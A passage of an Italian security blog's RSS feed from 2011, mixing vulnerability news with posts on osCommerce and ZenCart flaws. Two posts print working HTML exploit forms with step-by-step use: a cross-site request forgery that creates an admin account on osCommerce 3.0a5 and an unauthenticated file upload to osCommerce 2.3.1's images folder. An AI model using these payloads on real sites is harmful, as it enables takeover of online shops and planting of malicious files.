		<comments>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html#comments</comments>
		<pubDate>Fri, 20 May 2011 19:14:17 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack oscommerce]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[osCommerce 3]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[xsrf]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2725</guid>
		<description><![CDATA[Seguendo la scia di notizie degli ultimi tempi che han portato alla luce gravi vulnerabilità per le ultime versioni di OsCommerce (2.3.1) e ZenCart (1.3.9h) non poteva mancare all&#8217;appello anche l&#8217;ultimissima alpha release osCommerce 3.0.a5. Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/osCommerceLogo.jpg" rel="lightbox[2725]" title="osCommerceLogo"><img class="alignleft size-thumbnail wp-image-2726" title="osCommerceLogo" src="http://www.capn3m0.org/wp-content/uploads/2011/05/osCommerceLogo-150x137.jpg" alt="[EXPLOIT]   osCommerce v3.0a5 Multiple Vulnerabilities" width="150" height="137" /></a>Seguendo la scia di notizie degli ultimi tempi che han portato alla luce <strong>gravi vulnerabilità</strong> per le ultime versioni di <strong><a href="http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html">OsCommerce (2.3.1)</a> e<a href="http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html"> ZenCart (1.3.9h)</a></strong> non poteva mancare all&#8217;appello anche l&#8217;ultimissima alpha release <strong>osCommerce 3.0.a5</strong>.</p>
<p>Per gli sviluppatori di OsCommerce è davverò un brutto periodo dato che in neanche un mese tutti le versioni attualmente &#8220;stabili&#8221; sono state bucate da molteplici vulnerabilità. Nella release specifica, che ripetiamo si tratta di una alpha, sono state individuate vulnerabilità di tipo <strong>Xss, Full Path Disclosure, Local File Inclusion e XSRF</strong>.</p>
<p>La<strong> Full Path Disclosure</strong> consiste nell&#8217;interrogare alcuni file del Template di OsCommerce che, andando in errore,<strong> mostrano a video la full path</strong> della loro posizione sul Server. Con questa sola informazione si può fare poco ma, anche in questo caso, se unita ad altri tipi di attacchi diventa una utile informazione. La <strong>XSS permette di iniettare codice JavaScript </strong>sfruttando una falla del file &#8220;products.php&#8221; mentre la <strong>Local File Inclusion</strong> consente di richiamare file presenti sul Server sfruttando la procedura di disinstallazione moduli del Cms che non verifica opportunamente i parametri passati e permette di accettare in input qualsiasi path raggiungibile.</p>
<p>Anche in questo caso c&#8217;è una <strong>falla più grave </strong>delle altre e a mio avviso è la <strong>XSRF</strong> che permette di inviare comandi all&#8217;applicativo senza che questi vengano verificati in alcun modo. Nel caso specifico <strong>sarà possibile creare un nuovo Admin sull&#8217;OsCommerce</strong>.</p>
<p>Basterà creare una pagina &#8220;.html&#8221; contenente il seguente codice:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">&lt;html&gt;
&lt;body&gt;
&lt;form action=&quot;http://&lt;sito vittima&gt;/admin/index.php?administrators&amp;action=save&quot; method=&quot;post&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;user_name&quot; value=&quot;&lt;nomeutente&gt;&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;user_password&quot; value=&quot;&lt;password&gt;&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;modules[]&quot; value=&quot;0?&gt;
&lt;input type=&quot;hidden&quot; name=&quot;subaction&quot; value=&quot;confirm&quot;/&gt;
&lt;input type=&quot;submit&quot; value=&quot;Save&quot;&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</pre></div></div>

<p>Ovviamente dovrete sostituire i seguenti parametri:</p>
<p><strong>&lt;sito vittima</strong>&gt; con il dominio del sito in cui si vuole creare l&#8217;account</p>
<p><strong>&lt;nomeutente&gt;</strong> con il nome utente del nuovo Admin</p>
<p><strong>&lt;password&gt;</strong> con la password da associare al nuovo Admin</p>
<p>Una volta creata la pagina richiamatela dal vostro Browser e cliccate su &#8220;Save&#8221;.</p>
<p>Se tutto è andato a buon fine accedendo all&#8217;url:</p>
<p><cite>http://&lt;sito vittima&gt;/admin/</cite></p>
<p><strong>potrete loggarvi come Admin</strong> con i dati appena inseriti.</p>
<p>Per informazioni dettagliate vi rimando al link del <strong>Dr. Alberto Fontanella</strong> autore dell’articolo.</p>
<p><a href="http://ictsec.wordpress.com/exploits/oscommerce-v3-0a5-multiple-vulnerabilities/" target="_blank">osCommerce v3.0a5 [ Multiple Vulnerabilities ]</a></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-oscommerce-v3.0a5-multiple-vulnerabilities.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; ZenCart 1.3.9h Multiple Vulnerabilities</title>
		<link>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html</link>
		<comments>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html#comments</comments>
		<pubDate>Fri, 20 May 2011 17:37:19 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[Arbitrary File Upload]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack zencart]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[zencart]]></category>
		<category><![CDATA[zencart 1.3.9h]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2723</guid>
		<description><![CDATA[E&#8217; ormai consuetudine che dopo l&#8217;individuazione di una nuova falla per OsCommerce a catena vengano individuate le stesse (o quasi) falle per ZenCart, altro noto Cms derivato dallo stesso OsCommerce. La versione vulnerabile è l&#8217;ultima disponibile ossia la 1.3.9h e presenta vulnerabilità di vario tipo: Full Path Disclosure, Reflected XSS, Stored XSS e Arbitrary File [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/zencart_logo.jpg" rel="lightbox[2723]" title="zencart_logo"><img class="alignleft size-thumbnail wp-image-2724" title="zencart_logo" src="http://www.capn3m0.org/wp-content/uploads/2011/05/zencart_logo-150x88.jpg" alt="[EXPLOIT]   ZenCart 1.3.9h Multiple Vulnerabilities" width="150" height="88" /></a>E&#8217; ormai consuetudine che dopo l&#8217;individuazione di una <a href="http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html"><strong>nuova falla</strong></a> per OsCommerce a catena vengano individuate le stesse (o quasi) falle per<a href="http://www.zen-cart.com/" target="_blank"> <strong>ZenCart</strong></a>, altro noto Cms derivato dallo stesso OsCommerce.</p>
<p>La versione vulnerabile è l&#8217;ultima disponibile ossia la <strong>1.3.9h</strong> e presenta vulnerabilità di vario tipo: <strong>Full Path Disclosure, Reflected XSS, Stored XSS e Arbitrary File Upload</strong>.</p>
<p>La vulnerabilità <strong>Full Path Disclosure</strong> permette, se la gestione degli errori è configurata per mostrarli a video, di<strong> conoscere la path assoluta</strong> dell&#8217;applicativo. Di per sé non è una falla che consente di effettuare alcun tipo di azione ma l&#8217;informazione che si ottiene potrebbe essere utile se unita ad attacchi che vanno a scrivere sul FileSystem o similari. Le due <strong>XSS</strong>, invece, non affliggono l&#8217;attuale 1.3.9h ma <strong>tutte le versioni precedenti</strong>. Le vulnerabilità sono localizzate nel campo &#8220;Quantità&#8221; del carrello che permette l<strong>&#8216;injection di codice XSS</strong> e nell&#8217;Area Amministrativa &#8220;Location/Taxes&#8221;. Per quest&#8217;ultima, quindi, si presume che si abbia già l&#8217;accesso Admin.</p>
<p>L&#8217;ultima vulnerabilità, la più grave, riguarda invece il <strong>componente Banner (banner_manager.php)</strong> che, così come per OsCommerce, permette di <strong>effettuare l&#8217;upload di files</strong> che verranno salvati nella cartella &#8220;images&#8221;.</p>
<p>Per informazioni dettagliate vi rimando al link del <strong>Dr. Alberto Fontanella</strong> autore dell&#8217;articolo.</p>
<p><a href="http://ictsec.wordpress.com/exploits/zen-cart-v-1-3-9h-multiple-vulnerabilities/" target="_blank">Zen Cart &lt;= v.1.3.9h [ Multiple Vulnerabilities ]</a></p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-zencart-1.3.9h-multiple-vulnerabilities.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; OsCommerce 2.3.1 Remote File Upload Vulnerability</title>
		<link>http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html</link>
		<comments>http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html#comments</comments>
		<pubDate>Thu, 19 May 2011 18:31:22 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[authentication bypass]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack oscommerce]]></category>
		<category><![CDATA[oscommerce]]></category>
		<category><![CDATA[osCommerce 2.3.1]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[remote file upload]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2630</guid>
		<description><![CDATA[Come ricordete l&#8217;ultima volta che venne nominato l&#8217;ecommerce OsCommerce su questo sito era per segnalare una grave vulnerabilità presente in tutte le versioni. La falla era presente anche in diverse versioni di ZenCart in quanto derivato da OsCommerce stesso. A distanza di 2 anni i programmatori, dopo una lunga latitanza, hanno rilasciato 2 nuove versioni: [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/oscommerce_logo.gif" rel="lightbox[2630]" title="oscommerce_logo"><img class="alignleft size-thumbnail wp-image-2631" title="oscommerce_logo" src="http://www.capn3m0.org/wp-content/uploads/2011/05/oscommerce_logo-150x114.gif" alt="[EXPLOIT]   OsCommerce 2.3.1 Remote File Upload Vulnerability" width="150" height="114" /></a>Come ricordete l&#8217;ultima volta che venne nominato l&#8217;ecommerce <a href="http://oscommerce.com/" target="_blank"><strong>OsCommerce</strong></a> su questo sito era per <a href="http://www.capn3m0.org/exploit-poc-oscommerce-2.2-rc2-authentication-bypass.html">segnalare</a> una <strong>grave vulnerabilità</strong> presente in tutte le versioni. La falla era presente anche in diverse versioni di ZenCart in quanto derivato da OsCommerce stesso.</p>
<p>A distanza di 2 anni i programmatori, dopo una lunga latitanza, hanno rilasciato <strong>2 nuove versioni</strong>: la <strong>2.3.1</strong> e la nuova <strong>3.0.1</strong>. Il rilascio delle due nuove versioni non ha avuto molto risalto e tra gli utilizzatori di questo applicativo pochi hanno provveduto ad aggiornare.</p>
<p>Lo scorso 14 Maggio, però, è stata scoperta una <strong>nuova falla</strong> (purtoppo molto simile alla precedente) che permette l&#8217;upload di files nella cartella &#8220;/images&#8221; senza dover utilizzare tecniche particolari o rubare i dati di Amministratore.</p>
<p><span id="more-2630"></span>Come riportato <a href="http://www.bugsearch.net/it/11838/oscommerce-231-bannermanagerphp-remote-file-upload-vulnerability.html" target="_blank"><strong>qui</strong></a> il componente Banner (<strong>banner_manager.php</strong>) della nuova versione 2.3.1 di OsCommerce soffre di una vulnerabilità che <strong>consente di uploadare files</strong> sul sito &#8220;vittima&#8221; semplicemente creando sul proprio PC una pagina html con il seguente codice:</p>

<div class="wp_syntax"><div class="code"><pre class="html" style="font-family:monospace;">&lt;form name=”new_banner” action=”http://site/path/admin/banner_manager.php/login.php?action=insert” method=”post” enctype=”multipart/form-data”&gt;&lt;br&gt;
&lt;input type=”file” name=”banners_image”&gt;&lt;br&gt;
&lt;input name=”submit” value=” Save ” type=”submit”&gt;&lt;/form&gt;</pre></div></div>

<p>Basterà sostituire a &#8220;<strong>site/path</strong>&#8221; il dominio e l&#8217;eventuale sottocartella del sito basato su questo Cms e salvare il file in formato &#8220;.html&#8221;.</p>
<p>Apritelo con il vostro Browser e vi troverete davanti un form di upload file.</p>
<p>Scegliete il vostro file e fate l&#8217;upload; una volta terminata l&#8217;operazione potrete interrogare il file richiamando l&#8217;url nel seguente modo:</p>
<p>http://<strong>site/path</strong>/images/&lt;fileinviato.php&gt;</p>
<p>Analizzando alcuni casi di utilizzo di questa vulnerabilità ho riscontrato casi di <strong>iniezione di virus/malware</strong> come <a href="http://www.capn3m0.org/hack-cannot-redeclare-security_update.html">già riscontrato</a> sempre nel 2009.</p>
<p>Non appena avrò maggiori informazioni provvederò a tenervi aggiornati.</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/exploit-oscommerce-2.3.1-remote-file-upload-vulnerability.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Google risolve grave problema di sicurezza su Android</title>
		<link>http://www.capn3m0.org/google-risolve-grave-problema-di-sicurezza-su-android.html</link>
		<comments>http://www.capn3m0.org/google-risolve-grave-problema-di-sicurezza-su-android.html#comments</comments>
		<pubDate>Wed, 18 May 2011 21:02:52 +0000</pubDate>
		<dc:creator>Federico Raffaelli</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[android fix]]></category>
		<category><![CDATA[android security issue]]></category>
		<category><![CDATA[gingerbread 2.3.4]]></category>
		<category><![CDATA[google patch]]></category>
		<category><![CDATA[google-android]]></category>
		<category><![CDATA[Honeycomb 3.0]]></category>
		<category><![CDATA[wifi hack]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2623</guid>
		<description><![CDATA[Non sono passate nemmeno 24 ore da quando é stata scoperta una gravissima vulnerabilità di Android che Google é corsa ai ripari sviluppando un fix che verrà rilasciato via ota già dalle prossime ore. La vulnerabilità è particolarmente grave perchè colpisce piú del 99% dei device attivi, ne risultano immuni infatti solo le versioni Gingerbread [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/05/20110518-111359.jpg" rel="lightbox[2623]" title="android"><img class="alignleft size-thumbnail wp-image-2626" title="android" src="http://www.capn3m0.org/wp-content/uploads/2011/05/20110518-111359-150x150.jpg" alt="Google risolve grave problema di sicurezza su Android" width="150" height="150" /></a>Non sono passate nemmeno 24 ore da quando é stata scoperta una <strong>gravissima vulnerabilità</strong> di <strong>Android</strong> che <strong>Google</strong> é corsa ai ripari sviluppando un fix che verrà rilasciato via ota già dalle prossime ore.</p>
<p>La vulnerabilità è particolarmente grave perchè <strong>colpisce piú del 99% dei device</strong> attivi, ne risultano immuni infatti solo le versioni <strong>Gingerbread 2.3.4</strong> e <strong>Honeycomb 3.0 e 3.1</strong>.<br />
Per fortuna, in attesa di ricevere il fix nei prossimi giorni gli utenti potranno comunque proteggersi mettendo in pratica alcuni accorgimenti.<br />
Il <strong>problema di sicurezza</strong> si verifica solo se un utente si collega ad una <strong>rete wifi libera</strong>, quindi chiunque si connetta abitualmente ad <strong>hotspot</strong> o lo abbia fatto di recente farebbe meglio a disattivare l&#8217;opzione di connessione automatica alle reti wifi ed eliminando il consenso a quelle utilizzate di recente, nel caso la rete free fosse di proprietà il consiglio é ovviamente quello di impostare una protezione, ma questo é una buona norma sempre, non solo in casi di vulnerabilità come quella di cui stiamo parlando in questo articolo.<br />
Allo stato attuale, in attesa della <strong>patch di Google</strong>, il rischio che si corre é quello che un utente non autorizzato possa accedere ai nostri dati contenuti nel <strong>calendario</strong> e nei <strong>contatti</strong> di Android perché lo scambio di autorizzazione tra il client e server non avviene tramite protocollo <strong>https</strong> (Hyper Text Transfer Protocol Secure), ma tramite semplice http.<br />
Tuttavia Google sta valutando anche la connessione alle librerie di <strong>Picasa</strong> che sembrerebbero anch&#8217;esse affette dalla stessa vulnerabilità, un motivo in piú per diffidare delle reti aperte fino a che non sarà cessato del tutto questo giustificato allarme.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/google-risolve-grave-problema-di-sicurezza-su-android.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Upgrade Joomla 1.5.23/1.6.3 &#8211; WordPress 3.1.2</title>
		<link>http://www.capn3m0.org/upgrade-joomla-wordpress.html</link>
		<comments>http://www.capn3m0.org/upgrade-joomla-wordpress.html#comments</comments>
		<pubDate>Wed, 27 Apr 2011 17:37:52 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[Web&Cms]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[joomla 1.5]]></category>
		<category><![CDATA[joomla 1.6]]></category>
		<category><![CDATA[security release]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[wordpress 3.1]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=2272</guid>
		<description><![CDATA[Il mese di Aprile 2011 per i due più diffusi Cms Php/MySQL ossia Joomla e WordPress sono state rilasciate diverse versioni, alcune legate a falle di sicurezza, altre a normali bug fix. Per Joomla, che attualmente sta portando avanti le due famiglie 1.5.x e 1.6.x sono state rilasciate le versioni 1.5.23 e 1.6.3 (c&#8217;è stata [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.capn3m0.org/wp-content/uploads/2011/04/wordpress-vs-joomla.png" rel="lightbox[2272]" title="wordpress-joomla"><img class="alignleft size-thumbnail wp-image-2273" title="wordpress-joomla" src="http://www.capn3m0.org/wp-content/uploads/2011/04/wordpress-vs-joomla-150x150.png" alt="Upgrade Joomla 1.5.23/1.6.3   WordPress 3.1.2" width="150" height="150" /></a>Il mese di Aprile 2011 per i due più diffusi Cms Php/MySQL ossia <a href="http://www.joomla.org/" target="_blank"><strong>Joomla</strong></a> e <a href="http://wordpress.org/" target="_blank"><strong>WordPress</strong></a> sono state rilasciate diverse versioni, alcune legate a falle di sicurezza, altre a normali bug fix.</p>
<p>Per <strong>Joomla</strong>, che attualmente sta portando avanti le due famiglie 1.5.x e 1.6.x sono state rilasciate le versioni <strong>1.5.23</strong> e <strong>1.6.3</strong> (c&#8217;è stata anche una 1.6.2 che ha avuto una vita molto breve).</p>
<p>La 1.5.23 è una security release in quanto una vulnerabilità nelle precedenti versioni permetteva di generare un errore che <strong>printava a video la path assoluta del sito</strong> (<strong>Information Disclosure</strong>). Era una informazione in più in mano all&#8217;eventuale hacker ma nulla di realmente pericoloso.</p>
<p><strong><a href="http://www.joomla.org/announcements/release-news/5367-joomla-1523-released.html" target="_blank">Joomla 1.5.23</a></strong></p>
<p>Le versione 1.6.3, invece, è una bug fix che risolve alcuni problemi emersi con questa nuova versione.</p>
<p>Al link sottostante potrete trovare maggiori informazioni e  consultando il Changelog potrete leggere tutte le modifiche/correzioni  che sono state apportate.</p>
<p><a href="http://www.joomla.org/announcements/release-news/5370-joomla-163-released.html" target="_blank"><strong>Joomla 1.6.3</strong></a></p>
<p>Per quanto riguarda <strong>WordPress</strong>, invece, sono state rilasciate a distanza di pochi giorni le versioni 3.1.1 e, l&#8217;ultima, la <strong>3.1.2</strong> che corregge una vulnerabilità (security release) che <strong>permetteva agli utenti &#8220;Contributor&#8221; di postare bypassando la</strong> fase di <strong>revisione</strong> obbligatoria da parte <strong>dell&#8217;Admin</strong>.</p>
<p><a href="http://wordpress.org/download/" target="_blank"><strong>WordPress 3.1.2</strong></a></p>
<p>Si consiglia a tutti di effettuare gli upgrade dei propri Cms e, soprattutto, di monitorare costantemente la pubblicazione di nuove release, soprattutto quando si tratta di security release <img src='http://www.capn3m0.org/wp-includes/images/smilies/icon_wink.gif' alt="Upgrade Joomla 1.5.23/1.6.3   WordPress 3.1.2" class='wp-smiley' title="Upgrade Joomla 1.5.23/1.6.3   WordPress 3.1.2 pics" /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/upgrade-joomla-wordpress.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft, patch day da record</title>
		<link>http://www.capn3m0.org/microsoft-patch-day-da-record.html</link>
		<comments>http://www.capn3m0.org/microsoft-patch-day-da-record.html#comments</comments>
		<pubDate>Wed, 13 Apr 2011 05:00:23 +0000</pubDate>
		<dc:creator>Tacu</dc:creator>
				<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Varie]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[patch]]></category>
		<category><![CDATA[patch-day]]></category>
		<category><![CDATA[vulnerabilità]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/microsoft-patch-day-da-record.html</guid>
		<description><![CDATA[Il patch day di aprile porta all'utenza Microsoft un aggiornamento da record: 17 patch per 64 vulnerabilità. ]]></description>
			<content:encoded><![CDATA[<p>Il patch day di aprile porta all&#8217;utenza Microsoft un aggiornamento da record: 17 patch per 64 vulnerabilità.</p>
<p>Read the original:<br />
<a title="Microsoft, patch day da record" href="http://feedproxy.google.com/~r/webnewsit/~3/rSr9GqNlRUk/" target="_blank">Microsoft, patch day da record</a></p>
<p>Source: <a title="Informazione dal mondo digitale" href="http://www.webnews.it" target="_blank">Webnews</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/microsoft-patch-day-da-record.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano</title>
		<link>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html</link>
		<comments>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html#comments</comments>
		<pubDate>Mon, 01 Nov 2010 20:36:05 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack mail]]></category>
		<category><![CDATA[provider]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sicurezza informatica]]></category>
		<category><![CDATA[vulnerabilità]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=808</guid>
		<description><![CDATA[ Ieri (28/10/2010) il programma televisivo Le Iene ha pubblicato un servizio dimostrativo sulla vulnerabilità dei sistemi informatici Italiani prendendo di mira un provider di caselle eMail gratuite. Il servizio dimostra come sia possibile accedere (con una piccola sostituzione di parametri) alla casella eMail di un estraneo e prenderne il completo controllo. ]]></description>
			<content:encoded><![CDATA[<p>Il 28/10/2010 il programma televisivo <strong>Le Iene</strong> ha pubblicato un servizio dimostrativo sulla vulnerabilità dei sistemi informatici Italiani prendendo di mira un provider di caselle eMail gratuite. Il servizio dimostra come sia possibile accedere (con una piccola sostituzione di parametri) alla casella eMail di un estraneo e prenderne il completo controllo.</p>
<p>
<object id="veohFlashPlayer" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="450" height="341" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="name" value="veohFlashPlayer" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.3.1024&amp;permalinkId=v205465564BHCqS5a&amp;player=videodetailsembedded&amp;videoAutoPlay=0&amp;id=anonymous" /><param name="allowfullscreen" value="true" /><embed id="veohFlashPlayer" type="application/x-shockwave-flash" width="450" height="341" src="http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.3.1024&amp;permalinkId=v205465564BHCqS5a&amp;player=videodetailsembedded&amp;videoAutoPlay=0&amp;id=anonymous" allowscriptaccess="always" allowfullscreen="true" name="veohFlashPlayer"></embed></object>
</p>
<p>Read the original here:<br />
 <a title="Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano" href="http://feedproxy.google.com/~r/OverSecurity/~3/9x5bVt5F7CY/" target="_blank">Servizio delle Iene sulla Sicurezza Informatica di un Provider Italiano</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/servizio-iene-sicurezza-informatica.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Neuromancer &#8211; Hacking sites with Joomla (Universidade USP)</title>
		<link>http://www.capn3m0.org/%e3%80%8cneuromancer%e3%80%8dhacking-sites-with-joomla-universidade-usp.html</link>
		<comments>http://www.capn3m0.org/%e3%80%8cneuromancer%e3%80%8dhacking-sites-with-joomla-universidade-usp.html#comments</comments>
		<pubDate>Sun, 31 Oct 2010 01:02:54 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Sicurezza]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[defacement]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[joomla 1.5]]></category>
		<category><![CDATA[neuromancer]]></category>
		<category><![CDATA[security exploit]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[universidade]]></category>
		<category><![CDATA[usp]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/?p=524</guid>
		<description><![CDATA[Video Tutorial dell&#8217;utilizzo della nota (e vecchia) vulnerabilità Joomla 1.5.x Remote Admin Password Change Original post: 「Neuromancer」Hacking sites with Joomla (Universidade USP)]]></description>
			<content:encoded><![CDATA[<p>Video Tutorial dell&#8217;utilizzo della nota (e vecchia) vulnerabilità <a href="http://www.capn3m0.org/joomla-15x-remote-admin-password-change.html" target="_self"><strong>Joomla 1.5.x Remote Admin Password Change</strong></a></p>
<p><object width="370" height="305" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="data" value="http://www.youtube.com/v/487RCxcT_og?f=videos&amp;app=youtube_gdata" /><param name="src" value="http://www.youtube.com/v/487RCxcT_og?f=videos&amp;app=youtube_gdata" /><embed width="370" height="305" type="application/x-shockwave-flash" src="http://www.youtube.com/v/487RCxcT_og?f=videos&amp;app=youtube_gdata" data="http://www.youtube.com/v/487RCxcT_og?f=videos&amp;app=youtube_gdata" /></object></p>
<p><img src="http://www.capn3m0.org/wp-content/uploads/2010/10/6078cffcdefault.jpg" alt="Neuromancer   Hacking sites with Joomla (Universidade USP)"  title="Neuromancer   Hacking sites with Joomla (Universidade USP) pics" /></p>
<p>Original post:<br />
<a title="「Neuromancer」Hacking sites with Joomla (Universidade USP)" href="http://www.youtube.com/watch?v=487RCxcT_og&amp;feature=youtube_gdata" target="_blank">「Neuromancer」Hacking sites with Joomla (Universidade USP)</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.capn3m0.org/%e3%80%8cneuromancer%e3%80%8dhacking-sites-with-joomla-universidade-usp.html/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[EXPLOIT] &#8211; Joomla all versions XSS vulnerability</title>
		<link>http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html</link>
		<comments>http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html#comments</comments>
		<pubDate>Sat, 09 Oct 2010 16:42:38 +0000</pubDate>
		<dc:creator>capn3m0</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Vulnerabilità]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[joomla]]></category>
		<category><![CDATA[proof of concept]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[wordpress]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://www.capn3m0.org/exploit-joomla-all-versions-xss-vulnerability.html</guid>
		<description><![CDATA[Ciao a tutti, dopo diverso tempo dall&#8217;ultimo post pubblico una vulnerabilità che potrà creare non pochi problemi agli utilizzatori del noto Cms Joomla. E&#8217; stata pubblicata da poco una vulnerabilità di tipo XSS per tutte le versioni &#60; =1.5.20, ossia tutte le versioni attualmente pubblicate. Tale exploit sfrutta una falla nella verifica delle variabili GET [...]]]></description>
			<content:encoded><![CDATA[<p><br class="spacer_" /></p>
